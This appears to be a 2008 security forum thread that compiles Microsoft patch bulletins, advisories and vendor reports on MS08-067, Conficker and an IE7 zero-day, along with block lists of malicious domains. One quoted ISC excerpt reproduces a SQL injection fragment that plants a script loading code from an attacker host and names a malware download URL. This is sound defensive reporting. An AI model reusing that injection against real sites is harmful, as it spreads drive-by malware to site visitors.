Sep. 19, 2008 - "The ThreatCon is currently at Level 1. Symantec is currently monitoring in-the-wild attacks leveraging the recently patched Windows Media Player ActiveX vulnerability associated with MS08-053. On September 15, 2008, the DeepSight honeynet observed active exploitation of this flaw as part of a web exploit kit. Successful exploitation of this, or any of the other targeted vulnerabilities, will install malicious code on victim computers. For details on the vulnerability, see the following: Microsoft Windows Media Encoder 9 'wmex.dll' ActiveX Control Remote Buffer Overflow Vulnerability ( http://www.securityfocus.com/bid/31065 ) We strongly urge all users to apply the patches made available in the MS08-053 security bulletin immediately. Those who cannot do so should set the kill bit on the associated CLSID (A8D3AD02-7508-4004-B2E9-AD33F087F43C) until patches can be applied. For more information and patches, see the Microsoft bulletin: Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution ( http://www.microsoft.com/technet/security/bulletin/MS08-053.mspx ) ."

:fear:

AplusWebMaster
2008-10-10, 00:59
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-oct.mspx
October 9, 2008 - "This is an advance notification of security bulletins that Microsoft is intending to release on October 14, 2008... (Total of -11-)

Critical (4)

AD Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

IE Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

HIS Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Host Integration Server...

Excel Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Important (6)

Windows 1 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Windows 2 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Windows 3 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Windows 4 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Windows 5 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Windows 6 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Moderate (1)

Office Bulletin
Maximum Severity Rating: Moderate
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Office...

//

AplusWebMaster
2008-10-10, 08:05
FYI...

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/951306.mspx
Published: April 17, 2008 | Updated: October 9, 2008
"Microsoft is investigating new public reports of a vulnerability which could allow elevation of privilege from authenticated user to LocalSystem, affecting Windows XP Professional Service Pack 2, Windows XP Professional Service Pack 3, and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008. Customers who allow user-provided code to run in an authenticated context, such as within Internet Information Services (IIS) and SQL Server, should review this advisory. Hosting providers may be at increased risk from this elevation of privilege vulnerability.
Microsoft is aware that exploit code has been published on the Internet for the vulnerability addressed by this advisory. Our investigation of this exploit code has verified that it does not affect customers who have applied the workarounds listed...
Revisions:
• April 17, 2008: Advisory published
• April 23, 2008: Added clarification to impact of workaround for IIS 6.0
• August 27, 2008: Added Windows XP Professional Service Pack 3 as affected software.
• October 9, 2008: Added information regarding the public availability of exploit code...

:fear:

AplusWebMaster
2008-10-14, 15:24
FYI...

MS e-mail spoofs with malware
- http://blogs.technet.com/msrc/archive/2008/10/13/microsoft-security-e-mail-spoofs-with-malware.aspx
October 13, 2008 - "... While malicious e-mails posing as Microsoft security notifications with attached malware aren’t new (we’ve seen this problem for several years) this particular one is a bit different in that it claims to be signed by our own Steve Lipner and has what appears to be a PGP signature block attached to it. While those are clever attempts to increase the credibility of the mail, I can tell you categorically that this is -not- a legitimate e-mail: it is a piece of malicious spam and the attachment is malware. Specifically, it contains Backdoor:Win32/Haxdoor... we never, ever, ever send attachments with our security notification e-mails. And, as a matter of company policy, Microsoft will never send you an executable attachment. If you get an e-mail that claims to be a security notification with an attachment, delete it. It is always a spoof..."

:fear::fear:

AplusWebMaster
2008-10-14, 20:22
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-oct.mspx
October 14, 2008
"This bulletin summary lists security bulletins released for October 2008...

Critical (4)

Microsoft Security Bulletin MS08-060
Vulnerability in Active Directory Could Allow Remote Code Execution (957280)
- http://www.microsoft.com/technet/security/Bulletin/MS08-060.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-058
Cumulative Security Update for Internet Explorer (956390)
- http://www.microsoft.com/technet/security/Bulletin/MS08-058.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-059
Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695)
- http://www.microsoft.com/technet/security/Bulletin/MS08-059.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Host Integration Server...

Microsoft Security Bulletin MS08-057
Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416)
- http://www.microsoft.com/technet/security/Bulletin/MS08-057.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Important (6)

Microsoft Security Bulletin MS08-066
Vulnerability in the Microsoft Ancillary Function Driver Could Allow Elevation of Privilege (956803)
- http://www.microsoft.com/technet/security/Bulletin/MS08-066.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-061
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (954211)
- http://www.microsoft.com/technet/security/Bulletin/MS08-061.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-062
Vulnerability in Windows Internet Printing Service Could Allow Remote Code Execution (953155)
- http://www.microsoft.com/technet/security/Bulletin/MS08-062.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-063
Vulnerability in SMB Could Allow Remote Code Execution (957095)
- http://www.microsoft.com/technet/security/Bulletin/MS08-063.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-064
Vulnerability in Virtual Address Descriptor Manipulation Could Allow Elevation of Privilege (956841)
- http://www.microsoft.com/technet/security/Bulletin/MS08-064.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-065
Vulnerability in Message Queuing Could Allow Remote Code Execution (951071)
- http://www.microsoft.com/technet/security/Bulletin/MS08-065.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Moderate (1)

Microsoft Security Bulletin MS08-056
Vulnerability in Microsoft Office Could Allow Information Disclosure (957699)
- http://www.microsoft.com/technet/security/Bulletin/MS08-056.mspx
Maximum Severity Rating: Moderate
Impact of Vulnerability: Information Disclosure
Affected Software: Microsoft Office...

---

ISC Anaylsis
- http://isc.sans.org/diary.html?storyid=5180
Last Updated: 2008-10-14 18:30:09 UTC

AplusWebMaster
2008-10-14, 21:59
FYI...

Microsoft Security Advisory (956391)
Cumulative Security Update of ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/956391.mspx
October 14, 2008 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory...
This update sets the kill bits for the following third-party software:
• Microgaming Download Helper...
• System Requirements Lab...
• PhotoStockPlus Uploader Tool...
This update sets the kill bits for ActiveX controls addressed in previous Microsoft Security Bulletins. These kill bits are being set in this update as a defense in depth measure:
• Unsafe Functions in Office Web Components (328130), MS02-044.
• Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (933103), MS08-017.
• Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617), MS08-041.
• Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593), MS08-052.
For more information about installing this update, see Microsoft Knowledge Base Article 956391*."
* http://support.microsoft.com/kb/956391
Last Review: October 14, 2008

:spider:

AplusWebMaster
2008-10-23, 15:48
FYI...

MS out-of-band patch - Critical
- http://isc.sans.org/diary.html?storyid=5227
Last Updated: 2008-10-23 12:16:16 UTC - "Microsoft has just released an advance notification* of an out-of-band update to be released on 23rd of October. They will hold a special webcast on the 23rd at 1:00 pm PT to discuss the release. The patch will be released at 10.00 am. The information in the bulletin mentions a remote code exploit, but no further details are provided, however a restart will be required. Microsoft rates the issue as -critical- for 2000/XP/2003 and important for vista/2008. If we get more information we'll update this diary."
* http://www.microsoft.com/technet/security/bulletin/ms08-oct.mspx
Critical (1)
Microsoft Security Bulletin to be issued: October 23, 2008
Windows Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

>>> http://forums.spybot.info/showthread.php?p=246351#post246351

:fear:

AplusWebMaster
2008-10-23, 23:56
FYI...

Microsoft Security Bulletin MS08-067
Vulnerability in Server Service Could Allow Remote Code Execution (958644)
- http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx
October 23, 2008 - "...This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit..."
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...
Exploitability Index: 1 - Consistent exploit code likely...

- http://blogs.technet.com/msrc/archive/2008/10/23/ms08-067-released.aspx
October 23, 2008
- http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx

---
MS08-067 - exploit in the wild
- http://www.symantec.com/security_response/threatconlearn.jsp
Oct. 23, 2008 - "The ThreatCon is currently at Level 2: Elevated. The DeepSight Threat Analysis Team has updated the ThreatCon to Level 2. Microsoft has released an out-of-band security bulletin to address a Critical flaw in the Server Service (SVRSVC). The vulnerability occurs because of a failure in processing malformed RPC packets sent to the service. By default this issue can be exploited without authentication on Windows 2000, Windows XP, and Windows 2003. Both Windows Vista and Windows Server 2008 are vulnerable, but require authentication by default.
MS08-067 - Vulnerability in Server Service Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
According to the bulletin this vulnerability is being actively exploited in the wild..."
---

- http://securitylabs.websense.com/content/Alerts/3218.aspx
10.23.2008

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
10.23.2008

- http://secunia.com/advisories/32326
Release Date: 2008-10-23
Critical: Highly critical
Impact: System access...

- http://isc.sans.org/diary.html?storyid=5227
Last Updated: 2008-10-23 20:58:46 UTC ...Version: 3
"...we believe that client computers need to be updated with all due haste..."

:fear:

AplusWebMaster
2008-10-28, 05:14
FYI...

Microsoft Security Advisory (958963)
Exploit Code Published Affecting the Server Service
- http://www.microsoft.com/technet/security/advisory/958963.mspx
October 27, 2008 - "Microsoft is aware that detailed exploit code demonstrating code execution has been published on the Internet for the vulnerability that is addressed by security update MS08-067*. This exploit code demonstrates code execution on Windows 2000, Windows XP, and Windows Server 2003. Microsoft is aware of limited, targeted active attacks that use this exploit code. At this time, there are no self-replicating attacks associated with this vulnerability. Microsoft has activated its Software Security Incident Response Process (SSIRP) and is continuing to investigate this issue. Our investigation of this exploit code has verified that it does not affect customers who have installed the updates detailed in MS08-067 on their computers. Microsoft continues to recommend that customers apply the updates to the affected products by enabling the Automatic Updates feature in Windows..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

:fear:

AplusWebMaster
2008-10-30, 22:28
FYI...

Vista updates KB957200 and KB953155
- http://isc.sans.org/diary.html?storyid=5258
Last Updated: 2008-10-30 14:02:45 UTC - "...A few readers are writing in to ask about two recent updates appearing in their queue: KB957200 and KB953155.

KB957200* is listed as a reliability update and according to Microsoft: "this update resolves some performance and reliability issues in Windows Vista. By applying this update, you can achieve better performance and responsiveness in various scenarios. After you install this item, you may have to restart your computer."
* http://support.microsoft.com/kb/957200/en-us

KB953155** is a security update related to MS08-062..."
** http://support.microsoft.com/kb/953155/en-us
Last Review: October 14, 2008
- http://www.microsoft.com/technet/security/bulletin/ms08-062.mspx
Updated: October 29, 2008
Version: 2.2...
"...There were no changes to the security update binaries..."

:fear:

AplusWebMaster
2008-11-01, 20:37
FYI...

- http://www.f-secure.com/weblog/archives/00001525.html
October 31, 2008 - " We are seeing the first Proof of Concept binaries that target the MS08-067 vulnerability on the following English localized systems:
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows 2003 Service Pack 2
The payload is encrypted as normal. It's function is to add the guest account to the administrators group, thus allowing unlimited access to the machine. We detect the binaries as follows:
Backdoor:W32/Agent.DIN
Backdoor:W32/Agent.DIO
Backdoor:W32/Agent.DIP
We'll continue to keep an eye on the events."

:fear: :fear:

AplusWebMaster
2008-11-03, 17:34
FYI...

Worm Exploiting MS08-067 in the Wild
- http://www.f-secure.com/weblog/archives/00001526.html
November 3, 2008 - "Code building on the proof of concept binaries that were mentioned last week has moved into the wild. We've received the first reports of a worm capable of exploiting the MS08-067 vulnerability. The exploit payload downloads a dropper that we detect as Trojan-Dropper.Win32.Agent.yhi. The dropped components include a kernel mode DDOS-bot that currently has a selection of Chinese targets in its configuration. The worm component is detected as Exploit.Win32.MS08-067.g and the kernel component as Rootkit.Win32.KernelBot.dg."

Also see: http://isc.sans.org/diary.html?storyid=5275
Last Updated: 2008-11-03 18:54:56 UTC ...(Version: 3)

:fear:

AplusWebMaster
2008-11-03, 23:46
FYI...

- http://www.theregister.co.uk/2008/11/03/microsoft_intelligence_report/
3 November 2008 - "Malware and unwanted software made strides in the first half of 2008, according to the latest security intelligence report from Microsoft, which tallied a 43 percent increase in the number of programs exorcised by the the company's malicious software removal tool. In the first six months of this year, there were some 62 million disinfections on 23.8 million machines, according to the report which was published* Monday. In the second half of last year, 42 million programs were removed on 15 million computers. Because it runs on hundreds of millions of machines worldwide, Microsoft's MSRT, or malicious software removal tool, functions as something of a bellwether for the state of successful attacks affecting Windows computers. The increase was driven in part by the addition of new strains of malware that the MSRT checks for, said Jeff Williams, principal architect for the Microsoft Malware Protection Center. Win32/Taterf, a family of worms that steals login credentials for a host of online games, was one such addition and was removed 2.7 million times. Other causes included the growing aggressiveness of established malware families. Win32/Zlob, a trojan that has bedeviled Windows users for years, was removed 7.5 million times..."
* http://www.microsoft.com/sir

:fear:

AplusWebMaster
2008-11-04, 17:48
More detail...

- http://asert.arbornetworks.com/2008/11/ms08-067-used-to-drop-ddos-bots/
November 3, 2008 - "...The exploit code is 67.exe, and the bot itself is 6767.exe. KernelBot is a Chinese origin DDoS bot... We first became aware of this bot during the CNN.Com attacks earlier this year... If you want to stop this one, you should block all web access to the domain ushealthmart .com. It’s using a few hosts under that domain name to spread and send out configurations... KernelBot can send ICMP, TCP SYN, UDP, and even HTTP flood attacks, among others. It communicates with a server to retrieve the file, usually named “cmd.txt”, which itself is a large INI file describing attacks and next actions..."

- http://isc.sans.org/diary.html?storyid=5288
Last Updated: 2008-11-05 02:53:31 UTC - "...exploiting ip 61.218.147.66. That IP is definitely sequentially scanning ip addresses for tcp 445 looking for vulnerable systems so blocking it at your enterprise gateway is recommended."

:fear:

AplusWebMaster
2008-11-06, 20:58
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx
November 6, 2008 - "This is an advance notification of security bulletins that Microsoft is intending to release on November 11, 2008... (Total of -2-)

Critical (1)

Windows Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Microsoft Office...

Important (1)

Windows Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows..."

AplusWebMaster
2008-11-11, 20:58
FYI...

Hacker tool targeting MS08-067 vuln
- http://securitylabs.websense.com/content/Blogs/3237.aspx
11.11.2008 - "Websense... has noticed a special hacker tool in China. In the past few weeks, Microsoft has announced and released a patch for the MS08-067 vulnerability, and a hacker tool named "wolfteeth bot catcher" has been widely used by hackers to attack machines running Windows operating systems -without- the KB958644 patch... First, the tool drops and runs a backdoor named bycnboy.exe, which moves itself to the system folder and is renamed to windef.exe. This means that hackers who used this tool were themselves hacked by the tool's author. Then a file named project.exe is placed in the temp folder and loaded to run once the original file has finished its job... a Trojan file from the user-defined Web site could be downloaded and executed. All the vulnerable IPs are controlled remotely..."

(Screenshots and more detail available at the URL above.)

:fear:

AplusWebMaster
2008-11-11, 20:59
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx
November 11, 2008 - "This bulletin summary lists security bulletins released for November 2008... (Total of -2-)

Critical (1)

Microsoft Security Bulletin MS08-069
Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)
- http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Important (1)

Microsoft Security Bulletin MS08-068
Vulnerability in SMB Could Allow Remote Code Execution (957097)
- http://www.microsoft.com/technet/security/bulletin/ms08-068.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Microsoft Windows...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5330
Last Updated: 2008-11-11 18:28:39 UTC

AplusWebMaster
2008-11-26, 19:23
FYI...

- http://blogs.technet.com/mmpc/archive/2008/11/25/more-ms08-067-exploits.aspx
November 25, 2008 5:37 PM - "As expected, we are seeing another wave of attacks exploiting the vulnerability detailed in security bulletin MS08-067. Early last week... the number of exploits in the wild was still low and they were mostly targeted attacks. However, during the weekend we started receiving customer reports for new malware that exploits this vulnerability. During the last two days that malware gained momentum and as a result we see an increased support call volume... This malware mostly spreads within corporations but also was reported by several hundred home users. It opens a random port between port 1024 and 10000 and acts like a web server. It propagates to random computers on the network by exploiting MS08-067. Once the remote computer is exploited, that computer will download a copy of the worm via HTTP using the random port opened by the worm. The worm often uses a .JPG extension when copied over and then it is saved to the local system folder as a random named dll. It is also interesting to note that the worm patches the vulnerable API in memory so the machine will not be vulnerable anymore... We have also found several bots that exploit MS08-067... We continue to urge all our customers to install MS08-067*..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
CVSS v2 Base Score: 10.0 (HIGH)...
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service...
- http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A
"...Microsoft strongly recommends that users apply the update referred to in Security Bulletin MS08-067 immediately..."

:fear::fear:

AplusWebMaster
2008-12-01, 03:24
FYI...

- http://blog.trendmicro.com/downad-gearing-up-for-a-botnet/
Nov. 30, 2008 - "A few days ago, Trend Micro got wind of a .DLL worm detected as WORM_DOWNAD.A that exploits the MS08-067 vulnerability. Its routines have lead our security analysts to postulate that it is a key component in the development of a new botnet. Initially thought to be working in conjunction with a NETWORM variant, WORM_DOWNAD.A is now believed to be an updated version of an attack from the same criminal botnet gang. Fresh reports, however, suggest that this threat seems to have gone wider and has even extended its reach around the globe. More than 500,000 unique hosts have since been discovered to have fallen victim to this threat. These infected hosts are spread across different countries and as a random check by Trend Micro... revealed, they can be found in service provider networks in the U.S., China, India, the Middle East, Europe, and Latin America — several residential broadband providers appear to have a larger number of infected customers..."

:fear::mad::fear:

AplusWebMaster
2008-12-05, 07:07
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
December 4, 2008
"This is an advance notification of security bulletins that Microsoft is intending to release on December 9, 2008... (Total of - 8 -)

Bulletin ID - Maximum Severity Rating and Vulnerability Impact - Restart Requirement - Affected Software

(Critical - 6)
Windows 1 - Critical - Remote Code Execution - Requires restart - Microsoft Windows
Windows 2 - Critical - Remote Code Execution - Requires restart - Microsoft Windows
IE - Critical - Remote Code Execution - Requires restart - Microsoft Windows, Internet Explorer
VB - Critical - Remote Code Execution - Requires restart - Microsoft Developer Tools and Software, Microsoft Office
Word - Critical - Remote Code Execution - Does not require restart - Microsoft Office
Excel - Critical - Remote Code Execution - Does not require restart - Microsoft Office
____

(Important- 2)
SharePoint- Important- Elevation of Privilege- Does not require restart - Microsoft Office, Microsoft Server Software
WMC - Important- Remote Code Execution - May require restart - Microsoft Windows
...

- http://www.us-cert.gov/current/#microsoft_releases_advanced_notification_for2
December 5, 2008 at 09:53 am - "... the December release cycle will contain eight bulletins, six of which will have a severity rating of Critical. The notification states that these Critical bulletins are for Microsoft Windows, Internet Explorer, and Office. There will also be two Important bulletins for Microsoft Windows and Office.."

AplusWebMaster
2008-12-10, 01:20
FYI...

Microsoft Security Advisory (960906)
Vulnerability in WordPad Text Converter Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/960906.mspx
Published: December 9, 2008 - "Microsoft is investigating new reports of a vulnerability in the WordPad Text Converter for Word 97 files on Windows 2000 Service Pack 4, Windows XP Service Pack 2, Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2. Windows XP Service Pack 3, Windows Vista, and Windows Server 2008 are -not- affected as these operating systems do not contain the vulnerable code. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through a service pack, our monthly security update release process, or an out-of-cycle security update, depending on customer needs. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability..."

- http://isc.sans.org/diary.html?storyid=5461
Last Updated: 2008-12-10 11:38:37 UTC

- http://blog.trendmicro.com/a-wordpad-of-caution/
Dec. 15, 2008 - "...The exploit works by using a specially-crafted .DOC, .WRI, or .RTF file to take advantage of the WordPad vulnerability, thereby causing the said application to crash. This crash may then allow a remote malicious user to take control of an affected system..."

- http://www.microsoft.com/technet/security/advisory/960906.mspx
• December 15, 2008: Updated the workaround, Disable the WordPad Text Converter for Word 97.

:fear:

AplusWebMaster
2008-12-10, 01:46
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
Published: December 9, 2008 - "This bulletin summary lists security bulletins released for December 2008... security bulletins for this month in order of severity... ( Total of - 8 - )

Critical (6)

Microsoft Security Bulletin MS08-071
Vulnerabilities in GDI Could Allow Remote Code Execution (956802)
- http://www.microsoft.com/technet/security/Bulletin/ms08-071.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-075
Vulnerabilities in Windows Search Could Allow Remote Code Execution (959349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-075.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-073
Cumulative Security Update for Internet Explorer (958215)
- http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows, Internet Explorer...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-070
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
Severity Rating: Critical
Affected Software: Microsoft Developer Tools and Software, Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-072
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173)
- http://www.microsoft.com/technet/security/bulletin/ms08-072.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-074
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070)
- http://www.microsoft.com/technet/security/bulletin/ms08-074.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Important (2)

Microsoft Security Bulletin MS08-077
Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175)
- http://www.microsoft.com/technet/security/bulletin/ms08-077.mspx
Severity Rating: Important
Affected Software: Microsoft Office, Microsoft Server Software...
Vulnerability Impact: Elevation of Privilege...

Microsoft Security Bulletin MS08-076
Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807)
- http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx
Severity Rating: Important
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...
_____

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5449
Last Updated: 2008-12-09 20:36:04 UTC
_____

- http://preview.tinyurl.com/5oqpcj
December 9, 2008 (Computerworld) - "(MS)... patched 28 vulnerabilities... the biggest batch of fixes it has issued since it switched to a regular monthly update schedule more than five years ago. Of the 28 bugs quashed today, Microsoft ranked 23 of them critical..."

:fear:

AplusWebMaster
2008-12-10, 14:12
FYI...

IE XML processing memory corruption
- http://secunia.com/advisories/33089/
Release Date: 2008-12-10
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Explorer 7.x...
...Successful exploitation allows execution of arbitrary code.
NOTE: Reportedly, the vulnerability is currently being actively exploited.
The vulnerability is confirmed in Internet Explorer 7 on a fully patched Windows XP SP3. Other versions may also be affected.
Solution: Do not browse untrusted websites or follow untrusted links.
Provided and/or discovered by: Reported as a 0-day...

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-10 09:38:03 UTC

- https://forums.symantec.com/syment/blog/article?blog.id=vulnerabilities_exploits&message.id=180#M180
12-10-2008 - "...We also recommend blocking the following hosts at network boundaries:
• wwwwyyyyy.cn
• sllwrnm5.cn
• baikec.cn
• oiuytr.net *
• laoyang4.cn
• cc4y7.cn ..."

* example: https://safeweb.norton.com/report/show?name=oiuytr.net

:fear::fear:

AplusWebMaster
2008-12-11, 12:45
FYI...

- http://securitylabs.websense.com/content/Alerts/3259.aspx
12.10.2008 - "...No user interaction is necessary for the exploit to be successful. A computer may become infected by simply visiting a malicious Web site. This vulnerability exists in the way XML is processed within Internet Explorer 7..."

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...Update: Microsoft published a bulletin regarding this issue*... In addition, shadowserver.org published a list of infected sites**. Note that this list may not be complete. The best mitigating action from the bulletin is probably to enable DEP for Internet Explorer 7...

* http://www.microsoft.com/technet/security/advisory/961051.mspx
December 10, 2008 - "...Suggested Actions... Workarounds:
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors...
• Set Internet and Local intranet security zone settings to "High" to prompt before running ActiveX Controls and Active Scripting in these zones...
• Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone...
• Enable DEP for Internet 7...

IE7 0-Day Exploit Sites
** http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
10 December 2008 - "...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not stop completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."

> http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...UPDATE 2: ...we received log files showing that attackers using SQL injection are now. The SQL Injection attacks are similar to those we've described multiple times before (see http://isc.sans.org/diary.html?storyid=4565 , for example). The important part includes the target URL that is injected:
… rtrim(convert(varchar(4000),['+@C+']))+''<script src=http ://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM …
This domain is not listed by Shadowserver yet. The 1.js script on the domain links to multiple other HTML documents of which one is called ie7.htm ... If executed successfully, the script will download the binary from http ://www [dot] steoo [dot] com/admin/win.exe. This is a game password stealer which has sporadic detection ( http://www.virustotal.com/analisis/244ae03fed5b32d999c50b614fddde6a ) – there are some big names still missing it. In any case, the attackers are picking this quickly so make sure that you are following recommendations from Microsoft's advisory which will help reduce exposure or, if you can, use an alternative browser until this has been fixed."

_____

- http://securitylabs.websense.com/content/Alerts/3260.aspx
12.11.2008 - "Websense... has discovered that the Taiwanese search engine "look.tw" has been compromised and is infecting site visitors with malicious code. The Web site has been injected with a recently announced Internet Explorer 7 Zero Day Attack ( http://securitylabs.websense.com/content/Alerts/3259.aspx ). The exploit on the site attempts to download a malicious excutable called "ieupdate.exe". The download location is currently down, but could come back at any moment."

:fear::fear::mad::mad:

AplusWebMaster
2008-12-12, 13:43
FYI...

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961051.mspx
Revisions:
• December 10, 2008: Advisory published
• December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds...
- Workarounds...
• Use ACL to disable OLEDB32.DLL...
• Unregister OLEDB32.DLL...
• Disable Data Binding support in Internet Explorer 8...

• December 15, 2008: Updated the workarounds, Disable XML Island functionality and Disable Row Position functionality of OLEDB32.dll.
...Registry Editor...

- http://support.microsoft.com/kb/961051
Last Review: December 14, 2008 - Revision: 3.0

:fear: :lip:

AplusWebMaster
